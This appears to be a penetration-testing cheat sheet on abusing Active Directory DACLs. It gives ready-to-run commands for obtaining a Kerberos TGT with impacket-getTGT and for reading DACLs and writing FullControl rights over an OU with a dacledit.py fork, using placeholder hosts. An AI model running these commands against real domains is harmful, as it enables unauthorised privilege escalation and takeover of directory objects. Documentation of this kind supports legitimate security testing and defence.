icon

DACL (Discretionary Access Control List) Attack

Last modified: 2023-10-22

DACL is a list of the trustees that are allowed or denied access to objects in Active Directory.

Add Rights

We may be able to take a full control of securable objects by getting GenericAll permission on OU (Organizational Unit).

1. Ask TGT for Kerberos Authentication

If we want to use Kerberos authentication for attacking DACL, we need to retrieve a TGT for specific user at first. In addition, to avoid authentication error, we need to synchronize the system time with the domain controller using ntpdate or rdate.

sudo ntpdate example.local
# or
sudo rdate -n example.local

impacket-getTGT -dc-ip dc.example.local example.local/username:password

The getTGT above dumps a .ccache file which stores TGT.

After dumping the .ccache file, set it to an environment variable for using the later processing.

export KRB5CCNAME=username.ccache

2. Read DACL

We can use Impacket's dacledit which has not yet been merged as of 2023/10/21.

The repository is here: https://github.com/ShutdownRepo/impacket/tree/dacledit

dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password
# -use-ldaps: Use LDAPS instead of LDAP
# -k: Use Kerberos authentication
dacledit.py -action read -target TestGroup -principal username -dc-ip 10.0.0.1 example.local/username:password -use-ldaps -k

3. Write DACL

dacledit.py -action write -rights 'FullControl' -principal username -target-dn'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k
# -use-ldaps: Use LDAPS instead of LDAP
# -k: Use Kerberos authentication
dacledit.py -action write -rights 'FullControl' -principal username -target-dn'OU=SERVICE USERS,DC=EXAMPLE,DC=LOCAL' -inheritance -dc-ip dc.example.local example.local/username:password -use-ldaps -k